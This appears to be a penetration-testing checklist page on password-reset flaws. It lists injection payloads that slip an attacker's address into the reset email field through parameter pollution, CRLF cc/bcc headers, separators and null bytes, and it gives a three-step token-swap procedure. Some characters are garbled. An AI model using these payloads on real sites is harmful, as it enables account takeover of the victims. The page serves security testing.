Reset Password
Password Reset Security testing Checklist
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
#No domain:
email=victim
#No TLD (Top Level Domain):
email=victim@xyz
#change param case
email=victim@mail.com&Email=attacker@mail.com
email@email.com**,**victim@hack.secry
email@email**β,β**victim@hack.secry
email@email.com**:**victim@hack.secry
email@email.com**%0d%0a**victim@hack.secry
**%0d%0a**victim@hack.secry
**%0a**victim@hack.secry
victim@hack.secry**%0d%0a**
victim@hack.secry**%0a**
victim@hack.secry**%0d**
victim@hack.secry**%00**
victim@hack.secry**{{}}**
step 1: Attacker Enter the victim's email or mobile number into the forgot password field.
step 2: Attacker intercept the request and got JSON data like that
{βemailβ:βvictim@gmail.comβ,βtokenβ:β1234"}
step 3: Attacker change victim email to his email id
{βemailβ:βattacker@gmail.comβ,βtokenβ:β1234"}
and forward the request.
*Notice on the old token is deactivated or not.
Last updated
Was this helpful?